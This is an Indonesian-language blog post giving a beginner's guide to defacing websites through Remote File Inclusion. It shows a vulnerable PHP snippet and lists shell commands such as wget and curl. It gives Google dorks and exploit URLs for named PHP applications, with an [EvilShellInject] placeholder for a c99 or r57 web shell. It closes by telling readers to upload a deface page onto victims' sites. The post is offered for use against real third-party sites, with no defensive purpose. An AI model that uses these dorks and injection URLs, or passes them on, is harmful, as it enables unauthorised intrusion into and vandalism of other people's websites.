Trending Topic

Cara Mudah Deface Web Via RFI

Posted by agus darlis On Minggu, 27 November 2011 0 komentar

Nah apa itu RFI, RFI adalah ( Remote File Include ) :
RFI adalah adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server .. !!!
Kenapa bisa terjadi RFI :
Dalam bahasa pemrograman PHP terdapat bugs PHP yang salah satunya adalah RFI .. !!!
if(!$_GET['p']
$p="main";
$p=$_GET['p'];
Nah dari codingan di atas kenapa bisa terjadi bugs RFI , udah dulu penjelasan nya kapan mulai nya :D yuk kita mulai bagaimana cara mudah deface web pakai RFI
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di milworm nah berhubung milworm udah gak ada lagi :D heheh cari ndiri deh yak hahah males muter-muter dari google karna koneksi berat 
Setelah anda berhasil nemu RFI ntah itu di situs apa sekarang kita cari DORK nya di google oneadmin site:.com / oneadmin site:com nah seperti ini contoh nya ntar http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject] yang berikut nya untuk PnPhpBB2 pasti belum pernah kan kalian para pembaca deface ini, tapi kalau buat para sesepuh pro haram di maklumi karna penulis masih pemula :D
nah jika ingin deface PnPPhpBB2 kita cari lagi DORK nya di google contoh nya modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki nih contoh setelah kalian berhasil mencari DORK pada google http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject] berikut contoh lagi hehehe banyak amat contoh nya http://www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject] 
Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya.. setelah semua nya berhasil bikin deh file yang berextensi index.html atau cari lagi di google script deface pasti nemu karna google baik kog :D setelah nemu upload file kalian ke direct nya setelah berhasil di upload liat website nya taraaaaaaaaaaaa ada nama kalian di sana :D hehehehehehe good luck buat kalian

0 komentar:

Posting Komentar

Dilarang keras membuat SPAM pada setiap komentar diblog ini